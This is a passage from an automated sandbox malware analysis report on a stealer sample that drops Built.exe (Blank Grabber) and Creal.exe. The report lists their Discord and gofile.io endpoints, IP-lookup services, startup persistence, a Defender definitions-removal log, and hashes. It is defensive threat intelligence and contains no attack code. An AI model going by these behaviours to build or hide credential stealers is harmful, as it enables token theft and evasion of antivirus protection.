                                                                                                                                                                                                          http://docs.python.org/library/itertools.html#recipesCreal.exe, 00000005.00000002.2422504490.00000203E7CA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://discord.com/api/users/Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://api.gofile.io/getServerCreal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://steam.com)Creal.exe, 00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbcaCreal.exe, 00000005.00000002.2422504490.00000203E7CA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngBuilt.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/Built.exe, 00000004.00000002.2162686689.000002D966B30000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372667948.00000203E786F000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2389785541.00000203E78D0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2369311620.00000203E7810000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373660739.00000203E78CF000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2382545416.00000203E7870000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2180042849.00000203E7811000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://ocsp.accv.es0Creal.exe, 00000005.00000003.2377722260.00000203E7B39000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2407470259.00000203E7B44000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373408012.00000203E7B2B000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2374098693.00000203E7B32000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2360921736.00000203E7B21000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2372998084.00000203E7B21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://www.cert.fnmt.es/dpcs/fCreal.exe, 00000005.00000003.2389785541.00000203E78D0000.00000004.00000020.00020000.00000000.sdmp, Creal.exe, 00000005.00000003.2373660739.00000203E78CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high

                                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            208.95.112.1
                                                                                                                                                                                                                            		ip-api.comUnited States
                                                                                                                                                                                                                            		53334TUT-ASUSfalse
                                                                                                                                                                                                                            104.26.12.205
                                                                                                                                                                                                                            		api.ipify.orgUnited States
                                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                            45.112.123.126
                                                                                                                                                                                                                            		api.gofile.ioSingapore
                                                                                                                                                                                                                            		16509AMAZON-02USfalse
                                                                                                                                                                                                                            34.160.111.145
                                                                                                                                                                                                                            		ifconfig.meUnited States
                                                                                                                                                                                                                            		2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                            159.89.102.253
                                                                                                                                                                                                                            		geolocation-db.comUnited States
                                                                                                                                                                                                                            		14061DIGITALOCEAN-ASNUSfalse

                                                                                                                                                                                                                            Private

                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                            127.0.0.1

                                                                                                                                                                                                                            General Information

                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1553259
                                                                                                                                                                                                                            Start date and time:2024-11-10 17:01:27 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 11m 46s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:30
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
                                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                                            Original Sample Name: .exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.troj.adwa.spyw.evad.winEXE@45/226@6/6
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                            HCA Information:Failed
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                            • VT rate limit hit for: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe

                                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            11:02:19API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                            11:02:20API Interceptor73x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                            17:02:28AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe

                                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                                            IPs

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            208.95.112.1Built.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                            main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                            • ip-api.com/json/
                                                                                                                                                                                                                            ypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                                                                                                                                                            • ip-api.com/xml
                                                                                                                                                                                                                            Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • ip-api.com/csv
                                                                                                                                                                                                                            Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • ip-api.com/csv
                                                                                                                                                                                                                            2N7MHjWNns.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                            202411070105F02558.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                            RFQ500005576.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                            T4tTl6dxyD.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                            m08H8HhpXN.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                            104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            perfcc.elfGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • api.ipify.org/
                                                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • api.ipify.org/

                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            ifconfig.memek_n_bat.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.160.111.145
                                                                                                                                                                                                                            6Ek4nfs2y1.exeGet hashmaliciousPhoenixKeylogger, PureLog StealerBrowse
                                                                                                                                                                                                                            • 34.117.118.44
                                                                                                                                                                                                                            uJ5c4dQ44E.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.117.118.44
                                                                                                                                                                                                                            uJ5c4dQ44E.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.117.118.44
                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.117.118.44
                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.MulDrop26.50476.18658.7474.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.117.118.44
                                                                                                                                                                                                                            Jv7Z27rOoW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.117.118.44
                                                                                                                                                                                                                            Jv7Z27rOoW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.117.118.44
                                                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.117.118.44
                                                                                                                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.117.118.44
                                                                                                                                                                                                                            ip-api.comBuilt.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            ypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            2N7MHjWNns.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            202411070105F02558.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            RFQ500005576.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            T4tTl6dxyD.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            m08H8HhpXN.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            api.ipify.orgypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                                                                                                                                                            • 104.26.13.205
                                                                                                                                                                                                                            Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                                                            Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                                                            6G1YhrEmQu.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                            • 104.26.13.205
                                                                                                                                                                                                                            pago de PEDIDO PROFORMA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                                                            https://thrifty-wombat-mjszmd.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                                                            https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                                                            TtyCIqbov8.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                                                            Play-Audio_Vmail_Ach Statement Credi....htmlGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                                                            XyXm15NU2A.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 172.67.74.152
                                                                                                                                                                                                                            geolocation-db.comhttps://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5fGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 159.89.102.253
                                                                                                                                                                                                                            https://www.newtoin.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 159.89.102.253
                                                                                                                                                                                                                            https://hayanami-4df5b.web.app/verifyDeliveryGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 159.89.102.253
                                                                                                                                                                                                                            https://hayanami-4df5b.firebaseapp.com/verifyDeliveryGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 159.89.102.253
                                                                                                                                                                                                                            HyZh4pn0RF.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                                                            • 159.89.102.253
                                                                                                                                                                                                                            FW PO 20240729TTPI 20240729TT.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                            • 159.89.102.253
                                                                                                                                                                                                                            231210-10-Creal-33652f.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                                                            • 159.89.102.253
                                                                                                                                                                                                                            GE AEROSPACE USA - WIRE REMITTANCE_.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                            • 159.89.102.253
                                                                                                                                                                                                                            AWB#803790 .htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 159.89.102.253
                                                                                                                                                                                                                            http://newsletter.haleymarketing.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 159.89.102.253

                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                                            Downloads.zipGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                                            XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                            • 172.67.179.207
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                                                                                                                                                            • 172.67.213.173
                                                                                                                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 104.21.30.39
                                                                                                                                                                                                                            TUT-ASUSBuilt.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            ypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            2N7MHjWNns.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            202411070105F02558.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            RFQ500005576.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            T4tTl6dxyD.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            m08H8HhpXN.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                            • 208.95.112.1
                                                                                                                                                                                                                            AMAZON-02USla.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.249.145.219
                                                                                                                                                                                                                            yakuza.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.135.130.56
                                                                                                                                                                                                                            yakuza.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 18.138.65.188
                                                                                                                                                                                                                            yakuza.arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 52.199.99.11
                                                                                                                                                                                                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                            shindeVi686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 34.249.145.219
                                                                                                                                                                                                                            shindeVx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 54.217.10.153
                                                                                                                                                                                                                            shindeVarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 54.171.230.55
                                                                                                                                                                                                                            botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                            • 108.157.7.31
                                                                                                                                                                                                                            botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                            • 34.213.8.129

                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dllBuilt.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                              windows update.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                w32e.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  3ORCHAMYoz.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    yuki.exeGet hashmaliciousLuna StealerBrowse
                                                                                                                                                                                                                                      CIEfSpAIUS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        iu56HJ45NV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          Discord_SiteLink.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            client11.png.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              PCuK01wybv.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pydBuilt.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                  PCuK01wybv.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                    SecuriteInfo.com.Python.Packed.59.10217.7860.exeGet hashmaliciousBlank GrabberBrowse

                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                                                                                                                                                                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                                                                                                                                                                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                                                                                                                                                                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                                                                                                                                                                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:@...e................................................@..........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):894
                                                                                                                                                                                                                                                      Entropy (8bit):3.104740744385702
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:Q58KRBubdpkoPAGdjrZrbk9+MlWlLehW51IC4r2:QOaqdmOFdjrFQ+kWResLI92
                                                                                                                                                                                                                                                      MD5:6F8ADD90BAD02A282532DAECF77345EC
                                                                                                                                                                                                                                                      SHA1:F809AFB42EC6DEAC6D4F59A01C07A351234D70E6
                                                                                                                                                                                                                                                      SHA-256:1357C1151126E1B4AF25D66398196F51A0D30A10BA2CE265877A6FDABD3941B3
                                                                                                                                                                                                                                                      SHA-512:E84A2F25FCDFCEE2ABDC94B7C88ABC905A5E06060C94FC4DFC6D3225C18D42B715A46FE8724C159A8D792172F50115DFA47E1A1E49D1A6D24469CF17342E6940
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. N.o.v. .. 1.0. .. 2.0.2.4. .1.1.:.0.2.:.3.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. N.o.v. .. 1.0. .. 2.0.2.4. .1.1.:.0.2.:.3.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Built.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):119192
                                                                                                                                                                                                                                                      Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                                                      MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                                                      SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                                                      SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                                                      SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                      • Filename: Built.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: windows update.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: w32e.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: 3ORCHAMYoz.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: yuki.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: CIEfSpAIUS.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                      • Filename: iu56HJ45NV.exe, Detection: malicious, Browse
